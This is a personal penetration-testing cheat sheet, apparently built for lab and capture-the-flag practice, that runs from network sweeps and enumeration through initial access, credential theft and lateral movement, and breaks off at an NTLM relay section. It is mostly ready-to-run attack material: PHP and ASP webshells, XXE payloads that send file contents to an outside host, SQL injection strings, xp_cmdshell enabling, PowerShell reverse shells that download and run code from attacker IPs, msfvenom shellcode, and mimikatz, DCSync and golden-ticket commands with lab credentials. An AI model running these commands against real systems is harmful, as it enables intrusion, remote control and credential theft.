My Cheet Sheet

My Cheet Sheet
SWEEP
Port Scan
- rustscan
- nmap
- Powershell
Recon
- Autorecon
- SNMP
- SMB
- DNS
- RPC
- LDAP
- Web
  - App
  - subdomain
  - dir
  - WordPress
  - endpoint
  - POST Fuzz
- enum4linux
Initial Access
- Path Traversal
  - id_sa
  - LFI
- Webshell
- File Upload
  - XXE
- Reverse Shell
  - Bypass
- SQLi
  - MSSQL
- ExploitDB
- shellcode
- Webdav
- ldap_shell
- hash_catch
- Other Bypass
Phishing
Foothold
- Linux
  - Background
  - Interactiveshell
- Windows
  - SHELL
  - Client Soft
Credential Access
- Brute Force
- hashcrack
- Windows
  - netexec
  - PsMapexec
  - kerbrute
  - mimikatz
  - SharpKatz
  - DomainPasswordSpray
  - AD
Lateral Movement
- NTLM Relay
  - ESC 8
  - ESC11
- Inveigh
- PsExec
- winRM
- DCOM
- RunasCs
- TightVNC
- Invoke-TheHash
Discovery
- Windows
  - LOLBIN
  - PowerView
  - winPEAS
  - Powerless
  - token
  - Sherlock
  - PrivescCheck
  - Snaffler
  - LaZagne
  - BloodHound
  - findDelegation
  - HostRecon
  - cmd
- Linux
  - cmd
  - linpeas
  - pspy
- Other
  - git
Privilege Escalation
- Windows
  - PowerUp
  - SharpUp
  - AlwaysInstallElevated
  - Abuse DACLs
  - LOLBIN
  - token
  - SePriv
  - PrintNightmare
  - HiveNightmare
  - S4U
  - ADCS
  - UAC bypass
  - Group
  - Other Tools
- Linux
Transfer
- Port Forwading
  - SSH
  - Chisel
  - Ligolo-ng
- SMB
- FTP
HTTP
Tips
- list
- RDP admin
- User-Name-List
- sheet

SWEEP

fping -asgq 172.16.5.0/24

#nmap
nmap -sn -v 192.168.50.1-253 -oG ping-sweep.txt

Port Scan

rustscan

rustscan -a <IP> --top --ulimit 5000

nmap

# TCP
# 22,21,25,389,3389,135,139,445,80,443,8080,8888,1433,5985,5986,8000
nmap -sT -n -Pn -v -A
nmap -sT -n -Pn -v --top-ports 1000 -A 192.168.50.1-254 
nmap -sT -n -Pn -v -T4 -p- -A
# UDP
nmap -sU -n -Pn -T4 -v --top-ports 500 

# SMB
# help /usr/share/nmap/scripts
nmap -p 135,139,445 -n -Pn --script smb-protocols,smb-os-discovery,smb-enum-shares,smb-enum-users,smb-enum-services 
nmap -p 135,139,445 -n -Pn --script smb-vuln-ms17-010,smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos,smb-vuln-webexec 

# SMTP
nmap -p 25 --script smtp-enum-users,smtp-commands,smtp-ntlm-info
#POP3
nmap -p 110 --script pop3-capabilities,pop3-ntlm-info 

# LDAP
nmap -p 389 -n -Pn --script ldap-rootdse

# vuln
nmap -n -Pn --script vuln 10.10.10.248

Powershell

# on powershell
Start-Job {1..8000 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.221.151", $_)) "TCP port $_ is open"} 2>$null}
Receive-Job -Id 
Stop-Job -Id

Recon

Autorecon

source /opt/autorecon/bin/activate
autorecon <CIDR>

SNMP

wget https://raw.githubusercontent.com/SECFORCE/SNMP-Brute/master/snmpbrute.py
python3 snmpbrute.py -t 10.10.11.193

# snmpwalk
snmpwalk -c internal -v2c 10.10.11.193

SMB

# smbclient
smbclient -N -L \\\\10.129.144.138
smbclient //192.168.226.248/transfer -U htb.local/user%[HASH] --pw-nt-hash
smbclient -L //192.168.171.175 -U V.Ventz --password='HotelCalifornia194!'

timeout 300
mask ""
recurse ON
prompt OFF
mget *


# smbmap
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

DNS

dig @192.168.192.196 matrimony.off any
dig @192.168.192.196 matrimony.off axfr

RPC

rpcclient -U '' -N 10.10.11.4
rpcclient -U user --password=weasal

enumdomains
enumdomgroups
lsaquery
querydominfo
enumdomusers

LDAP

https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap

ldapsearch -x -v -b "DC=hutch,DC=offsec" -H "ldap://192.168.215.122" "(objectclass=*)"
 | grep 'userPrincipalName:' -A 10 -B 40

ldapsearch -x -v -b "DC=hutch,DC=offsec" -D "user@hutch.offsec" -w pass -H "ldap://192.168.215.122" "(ms-MCS-AdmPwd=*)"

https://ldapwiki.com/wiki/Wiki.jsp?page=Active%20Directory%20User%20Related%20Searches https://ldapwiki.com/wiki/Wiki.jsp?page=Active%20Directory%20Group%20Related%20Searches https://ldapwiki.com/wiki/Wiki.jsp?page=Active%20Directory%20Computer%20Related%20LDAP%20Query

Web

App

# nikto
nikto -h http://

# whatweb
whatweb -v http://

subdomain

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u http:// -H "Host: FUZZ. " -mc all -fs 111

gobuster vhost -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain -u http://

dir

# ffuf
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -recursion -recursion-depth 2 -e .aspx,.txt,.pdf,.html,.php -u http://
ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-small.txt:FUZZ -ic -e .aspx,.txt,.pdf,.html,.php -u http:// 

# dirsearch
dirsearch -u https://

# gobuster
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -k -x aspx,txt,pdf,html,php -u http://
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-small.txt -k -x aspx,txt,pdf,html,php -u http://

# Dirb
dirb http://

# wordlist
comm -23 <(sort /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt) <(sort /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-small.txt)

WordPress

wpscan --url http://192.168.198.244 --enumerate u
wpscan --url http://192.168.229.174 --enumerate at -t 150
wpscan --url http://192.168.198.244 --enumerate p --plugins-detection aggressive  --plugins-version-detection  aggressive -t 150
wpscan --url http://192.168.198.244 --enumerate ap --plugins-detection mixed --plugins-version-detection  aggressive -t 150

wpscan --url http://192.168.169.121/wordpress/ -U 'loly' -P /usr/share/seclists/Passwords/Common-Credentials/darkweb2017-top1000.txt

endpoint

# katana
katana -u http://

POST Fuzz

ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d 'username=admin&password=FUZZ' -u http://
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -request req -u http://

enum4linux

# Userenum
enum4linux -u user -p pass -U 172.16.7.3

Initial Access

https://github.com/swisskyrepo/PayloadsAllTheThings

Path Traversal

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt

# linux
/etc/passwd

/proc/self/cmdline
/proc/1/cwd
/proc/2/environ

/home/offsec/.ssh/id_rsa
/home/offsec/.ssh/authorized_keys
/home/offsec/.ssh/known_hosts

/etc/nginx/nginx.conf
/etc/nginx/modules-enabled/default.conf
/etc/apache2/sites-enabled/000-default.conf
/opt/apache2/conf/httpd.conf
/opt/apache/conf/httpd.conf
/var/log/apache2/access.log

/etc/vsftpd.conf
/etc/knockd.conf

#Windows
/Windows/system.ini
/Windows/System32/Drivers/etc/hosts
/Users/ana/.ssh/id_rsa

id_sa

chmod 400 id_key
ssh -i id_key -p 2222

ssh -i root root@localhost -o IdentitiesOnly=yes

ssh-keygen -t rsa
mv id_rsa.pub authorized_keys
chmod 400 id_rsa

LFI

# page=...

php://filter/resource=admin.php
php://filter/convert.base64-encode/resource=admin.php

data://text/plain;base64,<base64>&cmd=ls

# EXEC
/tmp
/var/crash
/dev/shm

Webshell

/usr/share/webshells

<?php echo(system($_GET["cmd"])); ?>
<?php echo(shell_exec($_GET["cmd"])); ?>
<?php echo(exec($_GET["cmd"]));?>

<?php phpinfo();?>

Dfunc - php

git clone https://github.com/teambi0s/dfunc-bypasser

asp

<% eval request('cmd') %>

File Upload

htaccess

echo "AddType application/x-httpd-php .tak" > .htaccess

polyglot

exiftool -Comment='<?php echo "START\n"; echo(system($_GET["cmd"])); echo "\nEND"; ?>' unnamed.jpg -o polyglot.php

Wordpress
https://github.com/p0dalirius/Wordpress-webshell-plugin

XXE

<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>

DTD

malicious.dtd

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://192.168.1.1/?x=%file;'>">
%eval;
%exfil;

payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>

SVG Image

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>

Reverse Shell

https://www.revshells.com/
https://tex2e.github.io/reverse-shell-generator/index.html

Bypass

w'h'o'am'i
w"h"o"am"i

Linux

# /
${PATH:0:1}
${PWD:0:1}
# white
${IFS}
$9
# ;
${LS_COLORS:10:1}

Windows

# \
$env:HOMEPATH[0]

SQLi

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://portswigger.net/web-security/sql-injection/cheat-sheet

' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //

# colum
' ORDER BY 1-- //
' or 1=1 order by 6 #
' UNION SELECT database(), user(), @@version, null, null -- //
' union select 1,group_concat(schema_name),3,4,5,6 FROM information_schema.schemata #
' UNION SELECT null, username, password, description, null FROM users -- //

MSSQL

Inject

test' union select 1,@@version,3,4,5,6--
test' union select 1,DB_NAME(),3,4,5,6--
' union select USER_NAME(),2 -- - //
' union select name,2 FROM sys.databases -- - //
' union select name,2 FROM [DBname].sys.tables -- - //
test' union select 1,name,3,4,5,6 FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')--
test' union select 1,CONCAT(username, ' ', password),3,4,5,6 FROM users--

' union select s.login_name,2 from sys.dm_exec_sessions AS s -- - //
' union select CONCAT(name, ' ', sys.fn_varbintohexsubstring(1, password_hash, 1, 0)),2 from master.sys.sql_logins -- - //

impacket-mssqlclient

https://book.hacktricks.xyz/v/jp/network-services-pentesting/pentesting-mssql-microsoft-sql-server

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202

# help
help

# user enum
SELECT r.name, r.type_desc, r.is_disabled, sl.sysadmin, sl.securityadmin, sl.serveradmin, sl.setupadmin, sl.processadmin, sl.diskadmin, sl.dbcreator, sl.bulkadmin FROM master.sys.server_principals r LEFT JOIN master.sys.syslogins sl ON sl.sid = r.sid WHERE r.type IN ('S','E','X','U','G');

# impersonate
SELECT name FROM sys.server_permissions JOIN sys.server_principals ON grantor_principal_id = principal_id WHERE permission_name = 'IMPERSONATE';
EXECUTE AS LOGIN = 'sa';
## impacket
enum_impersonate
exec_as_login sa
## revert
REVERT;

# xp_cmdshell
enable_xp_cmdshell
disable_xp_cmdshell

EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';

# ole automation
EXEC sp_configure 'Ole Automation Procedures', 1
DECLARE @objShell INT; DECLARE @output varchar(8000); EXEC @output = sp_OACreate 'wscript.shell', @objShell Output; EXEC sp_OAMethod @objShell, 'run', NULL, 'cmd.exe /c "whoami > C:\Windows\Tasks\tmp.txt"';

# job
sp_start_job cmd.exe /c "whoami > C:\Windows\Tasks\tmp.txt"

# trustworthy
## role name and member
enum_db
enum_users
enum_owner
USE [DBname];
SELECT b.name, c.name FROM [DBname].sys.database_role_members a JOIN [DBname].sys.database_principals b ON a.role_principal_id = b.principal_id LEFT JOIN [DBname].sys.database_principals c ON a.member_principal_id = c.principal_id;
EXECUTE AS USER = 'dbo'
## sp_escalate
CREATE PROCEDURE sp_escalate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember '[imp_user]','sysadmin'
EXEC sp_escalate
## exec_as_login sa

SELECT * FROM fn_my_permissions(NULL, 'SERVER');

# Link Server list
enum_links
EXEC sp_linkedservers;
## link server
use_link SQL02
use_link localhost
### if RPC error
EXEC master.dbo.sp_serveroption @server = N'Servername', @optname = N'rpc out', @optvalue = N'true';

SELECT * FROM OPENQUERY(SQL02, 'SELECT IS_SRVROLEMEMBER(''sysadmin'')');
EXECUTE ('EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami";') AT SQL02;

# NTLM
responder -I tun0 
cd /usr/share/responder/logs

xp_dirtree \\10.10.14.23\any\thing

SELECT name FROM master.dbo.sysdatabases;
USE master
exec master.dbo.xp_dirtree '\\10.10.14.23\relay'
EXEC master..xp_subdirs '\\10.10.14.23\anything\'
EXEC master..xp_fileexist '\\10.10.14.23\anything\'

# Enum
## SELECT name FROM master.dbo.sysdatabases;
enum_db
USE [DBname];
SELECT * FROM [DBname].INFORMATION_SCHEMA.TABLES;

PowerUpSQL

https://github.com/NetSPI/PowerUpSQL/

Import-Module .\PowerUpSQL.psm1
Get-SQLInstanceDomain -Verbose
Invoke-SQLAudit -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01"

ExploitDB

searchsploit -m 42031

shellcode

https://shell-storm.org/shellcode/index.html

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f python

Webdav

cadaver http://

ldap_shell

https://github.com/PShlyundin/ldap_shell

ldap_shell nara-security.com/TRACY.WHITE:zqwj041FGX

TRACY.WHITE# add_user_to_group TRACY.WHITE 'REMOTE ACCESS'

hash_catch

scf, Library-ms, url, lnk

hashgrab

wget https://raw.githubusercontent.com/xct/hashgrab/main/hashgrab.py
python3 hashgrab.py MY_IP test

ntlm_theft

git clone https://github.com/Greenwolf/ntlm_theft
cd ntlm_theft
python3 ntlm_theft.py --generate all --server 10.10.14.8 --filename ntlms

odt

pip install ezodf
wget https://github.com/rmdavy/badodf/raw/master/badodt.py
python3 badodt.py

netexec

nxc smb 172.16.117.3 -u  -p '' -M slinky -o SERVER=172.16.117.30 NAME=important

Other Bypass

X-Forwarded-For: 127.0.0.1

Phishing

webdav

# webdav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /root/work/webdav
# sendmail
swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.232.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap

shellter

shellter

Foothold

Linux

Background

nohup python3  &

Interactiveshell

# 仮想tty
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo; fg 
export TERM=xterm
export SHELL=/bin/bash
reset

Windows

SHELL

#nc.exe
cmd.exe /c powershell 

powershell -nop -c "iwr -Uri http://192.168.45.218/nc.exe -Outfile C:\Windows\temp\nc.exe"
C:\Windows\temp\nc.exe 192.168.45.218 4444 -e powershell

# Invoke-PowerShellTcp
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
powershell.exe -nop -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.37 -Port 4444"

# powercat
cd /usr/share/powershell-empire/empire/server/data/module_source/management/
powershell.exe -nop -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.185/powercat.ps1');powercat -c 192.168.45.185 -p 4444 -e powershell"

# Unrestricted
powershell -ep bypass
Set-ExecutionPolicy Bypass -Force -Scope Process

Client Soft

# SMB
impacket-smbclient intelligence.htb/Tiffany.Molina:NewIntelligenceCorpUser9876@10.10.10.248
smbclient -U tyler \\\\test\\share
smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234

# psexec
impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100
# wmiexec
impacket-wmiexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
# dcomexec
impacket-dcomexec -object MMC20 active.htb/Administrator:Ticketmaster1968@10.10.10.100 'powershell -nop -w hidden -e' -silentcommand
impacket-dcomexec -object ShellWindows active.htb/Administrator:Ticketmaster1968@10.10.10.100 'powershell -nop -w hidden -e' -silentcommand -no-output
impacket-dcomexec -object ShellBrowserWindow active.htb/Administrator:Ticketmaster1968@10.10.10.100 'powershell -nop -w hidden -e' -silentcommand

# evil-winrm
evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!"
# atexec
impacket-atexec active.htb/Administrator:Ticketmaster1968@10.10.10.100 'powershell -nop -w hidden -e'

# TGT and evil-winrm-py
## get TGT
faketime -f '+7h' impacket-getTGT mirage.htb/user:Pass
# config
wget https://gist.github.com/zhsh9/f1ba951ec1eb3de401707bbbec407b98/raw/5a1ecf615cd687926138622c69c618a52466c812/configure_krb5.py
sudo python3 configure_krb5.py mirage.htb dc01
KRB5CCNAME=nathan.aadam.ccache faketime -f '+7h' evil-winrm-py -k --no-pass -i dc01.mirage.htb


## double hop
$SecPassword = ConvertTo-SecureString '!qazXSW@' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\backup', $SecPassword)
get-domainuser -spn -credential $Cred

Credential Access

Brute Force

# hydra
hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://192.168.50.202
hydra -L /usr/share/seclists/Passwords/UserPassCombo-Jay.txt -P /usr/share/seclists/Passwords/UserPassCombo-Jay.txt ftp://192.168.50.202 -f
hydra  -C /usr/share/seclists/Passwords/Default-Credentials/postgres-betterdefaultpasslist.txt postgres://192.168.175.47 -t 4

# hydra for HTTP
hydra -l admin -P /usr/share/seclists/Passwords/Common-Credentials/2024-197_most_used_passwords.txt 192.168.172.61 http-get /login -f
hydra -L /usr/share/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:usr=user&pwd=^PASS^:Login failed"
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.172.61 -s 8081 http-post-form '/service/rapture/session:username=^USER64^&password=^PASS64^:F=403' -f

# mdusa
sed 's/^/:/' /usr/share/seclists/Passwords/Default-Credentials/postgres-betterdefaultpasslist.txt > postgres-defaultpasslist.txt
medusa -C postgres-defaultpasslist.txt -h 192.168.175.47 -M postgres -n 5432 
medusa -h 192.168.168.108 -u postgres -P /usr/share/seclists/Passwords/UserPassCombo-Jay.txt -M postgres -n 5432

hashcrack

# MD5-RAW: 0, SHA-256: 1400, NTLM: 1000, NetNTLMv2: 5600, AS-REP: 18200, TGS-REP: 13100, DCC2: 2100
hashcat -m 0 -a 0 hash /usr/share/wordlists/rockyou.txt -r /usr/share/john/rules/best64.rule --force
#  Brute-force ASCII 5-9 characters
hashcat -m 1731 -a 3 hash ?a?a?a?a?a --force
## No ?s
hashcat -m 1731 -a 3 hash -1 ?l?u?d ?1?1?1?1?1?1 --force

# john
john --wordlist=/usr/share/wordlists/rockyou.txt --rules /usr/share/john/rules/best64.rule hash.txt
john --wordlist=/usr/share/wordlists/fasttrack.txt --rules /usr/share/john/rules/best64.rule hash

Windows

netexec

# Module list
nxc ldap -L
## Nomal
nxc smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success --local-auth --loggedon-users
nxc smb 192.168.226.189 192.168.226.191 192.168.226.248-249 -u user -H 54abdf854d8c0653b1be3458454e4a3b -d htb.local --continue-on-success
nxc smb 10.129.144.138 -u "guest" -p "" --rid-brute --pass-pol
nxc smb 10.129.144.138 -u user_list -p user_list --no-brute

# SMB share
nxc smb 10.129.204.177 -u username -p 'Nexus123!' -d inlanefreight.htb --shares
nxc smb 10.129.204.177 -u username -p 'Nexus123!' -d inlanefreight.htb --spider serviceaccount --regex .
nxc smb 10.129.204.177 -u username -p 'Nexus123!' -d inlanefreight.htb --share serviceaccount --get-file flag.txt flag.txt

# pass-pol
nxc smb 10.129.204.177  -u '' -p '' --pass-pol

# GPP
## gpp-decryp cmd
nxc smb 192.168.50.75 -u username -p 'Nexus123!' -M gpp_password
nxc smb 192.168.50.75 -u username -p 'Nexus123!' -M gpp_autologin

# asreproast
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' --asreproast asreproast2.out
# kerberoasting
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' --kerberoasting kerberoasting.out
# Kerberos Unconstrained Delegation
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' --trusted-for-delegation
# No password
nxc ldap 10.129.204.177 -u username -p 'Nexus123!' -d inlanefreight.htb --password-not-required

# MSSQL
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -M mssql_priv
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -M mssql_priv -o ACTION=privesc
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -x 'whoami'
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth --put-file /usr/share/windows-binaries/nc.exe 'C:/Windows/Temp/nc.exe'
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -q "SELECT name FROM master.dbo.sysdatabases"
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -q "SELECT table_name from interns.INFORMATION_SCHEMA.TABLES"
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -q "SELECT * from [dbname].[dbo].table_name"
nxc mssql 172.16.15.15 -u sql -p 'Nexus123!' --local-auth -M mssql_priv -o ACTION=rollback

# sid
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' --get-sid
# MS-DS-Machine-Account-Quota
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' -M maq
# gMSA
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' --gmsa
# laps
nxc ldap dc01.inlanefreight.htb -u username -p 'Nexus123!' -M laps

# secret dump
nxc smb 10.129.204.177 -u username -p 'Nexus123!' --sam
nxc smb 10.129.204.177 -u username -p 'Nexus123!' --ntds --enabled
nxc smb 10.129.204.177 -u username -p 'Nexus123!' --lsa 
nxc smb 10.129.204.177 -u username -p 'Nexus123!' -M lsassy
nxc smb 10.129.204.177 -u username -p 'Nexus123!' -M handlekatz
nxc smb 10.129.204.177 -u username -p 'Nexus123!' -M nanodump
## KeePass
nxc smb 10.129.203.121 -u username -p 'Nexus123!' -M keepass_discover
nxc smb 10.129.105.44 -u username -p 'Nexus123!' -M keepass_trigger -o ACTION=ALL KEEPASS_CONFIG_PATH=C:/Users/CreatePass/KeePass.config.xml
cat /tmp/export.xml | grep -i protectinmemory -5

## Vuln
nxc smb 10.129.203.121 -u username -p 'Nexus123!' -M zerologon
nxc smb 10.129.203.121 -u username -p 'Nexus123!' -M petitpotam
nxc smb 10.129.203.121 -u username -p 'Nexus123!' -M nopac

## Enable RDP
nxc smb 10.129.203.121 -u username -p 'Nexus123!' -M rdp -o ACTION=enable
nxc smb 10.129.203.121 -u username -p 'Nexus123!' -M rdp -o ACTION=disable

## Ticket
KRB5CCNAME=./administrator.ccache nxc smb test.ja.htb -k --use-kcache -x 'dir C:\Windows\Temp'

PsMapexec

wget https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.108/PsMapExec.ps1')

PsMapExec -Targets All -Domain htb.local -Method SMB -Username user -Hash 9a3121977ee93af56ebd0ef4f527a35e -Command "whoami"

kerbrute

wget https://raw.githubusercontent.com/insidetrust/statistically-likely-usernames/master/jsmith.txt

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /usr/share/seclists/Usernames/Names/names.txt

kerbrute passwordspray ./userlist Password123! --dc 10.10.10.248 -d active.htb

mimikatz

cd /usr/share/windows-resources/powersploit/Exfiltration/
cd /opt/mimikatz/x64

# PTH
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "privilege::debug" "sekurlsa::msv" "exit"
.\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:htb.local /ntlm:cc36cf7a8514893efccd332446158b1a" "exit"
#PTT
.\Rubeus.exe createnetonly /program:powershell.exe /show
.\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"
.\mimikatz.exe "privilege::debug" "kerberos::ptt c:\ticket\folder" "exit"

# silver ticket
whoami /user
.\mimikatz.exe "kerberos::golden /domain:htb.local /ptt /sid:S-1-5-21-1987370270-658905905-1781884369 /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:Administrator" "exit"

# golden ticket
whoami /user
.\mimikatz.exe "privilege::debug" "kerberos::purge" "kerberos::golden /ptt /user:Administrator /domain:htb.local /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:cc36cf7a8514893efccd332446158b1a" "exit"

# lsadump
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:krbtgt /domain:htb.local" "exit"
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /all /domain:htb.local" "exit"

# mimidrv.sys load
.\mimikatz.exe "privilege::debug" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/mimikatz.txt')
Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""

SharpKatz

wget https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.5_Any/SharpKatz.exe

# Logonpasswords
.\SharpKatz.exe --Command logonpasswords
# msv
.\SharpKatz.exe --Command msv
# list Kerberos encryption keys
.\SharpKatz.exe --Command ekeys
# dcsync
.\SharpKatz.exe --Command dcsync --Domain domain.com --DomainController dc01.domain.com

DomainPasswordSpray

wget https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.108/DomainPasswordSpray.ps1')

Invoke-DomainPasswordSpray -Password Winter2022 -ErrorAction SilentlyContinue

AD

impacket

# AS-REP
impacket-GetNPUsers -dc-ip 192.168.50.70  -request -outputfile hashes.asreproast corp.com/user:pass
impacket-GetNPUsers HTB.local/ -no-pass -dc-ip 10.10.10.161 -usersfile username.txt -format john -outputfile outhash.txt

# kerberoasting
impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request -save -outputfile tgs.hash

DCsync - secretsdump

https://www.thehacker.recipes/ad/movement/credentials/dumping/sam-and-lsa-secrets

impacket-secretsdump htb.local/userattk:takSecbe987@10.10.10.161 -just-dc
impacket-secretsdump htb.local/userattk:takSecbe987@10.10.10.161 -just-dc-user Administrator -just-dc-ntlm

# SAM
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM local
# ntds.dit
impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY local

Rubeus

# Unconstrained Delegate
# Ticket monitoring
.\Rubeus.exe monitor /interval:5 /nowrap
# Ticket dump
.\Rubeus.exe dump /nowrap
#PTT
## Sacrificial Process 
.\Rubeus.exe createnetonly /program:powershell.exe /show
.\Rubeus.exe asktgs /ticket:BASE64 /service:cifs/dc01.INLANEFREIGHT.local /ptt 
## TGT req
.\Rubeus.exe createnetonly /program:powershell.exe /show
.\Rubeus.exe asktgt /user:gpo_admin /password:'Password123' /domain:inlanefreight.ad /ptt
### TGT renew
.\Rubeus.exe renew /ticket:BASE64 /ptt /nowrap

# Constrained Delegate
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:www/WS01.inlanefreight.local /altservice:HTTP /user:DMZ01$ /rc4:ff955e93a130f5bb1a6565f32b7dc127 /ptt
## HTTP
Enter-PSSession ws01.inlanefreight.local


# PTT
## Sacrificial Process 
.\Rubeus.exe createnetonly /program:powershell.exe /show
## Ticket list 
.\Rubeus.exe triage
## Ticket Extracting
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap
.\Rubeus.exe renew /ticket:doIFVjCCBVKgAwIBBaEDA<SNIP> /ptt

# AS-REP
.\Rubeus.exe asreproast /nowrap /dc:

# Kerberoasting
.\Rubeus.exe kerberoast /stats
.\Rubeus.exe kerberoast /nowrap /format:hashcat /dc:
# RC4
.\Rubeus.exe kerberoast /nowrap /format:hashcat /dc: /tgtdeleg

# Golden Ticket
.\Rubeus.exe golden /rc4:992093609707726257e0959ce3e24771 /domain:dev.inlanefreight.ad /sid:S-1-5-21-2901893446-2198612369-2488268720 /user:Administrator /ptt
## SIDhistory
.\Rubeus.exe golden /sids:S-1-5-21-2879935145-656083549-3766571964-519

Lateral Movement

NTLM Relay

https://github.com/topotam/PetitPotam/blob/main/PetitPotam.py

# Enum target SMB
nxc smb 172.16.117.0/24 --gen-relay-list relayTargets.txt
# Responder
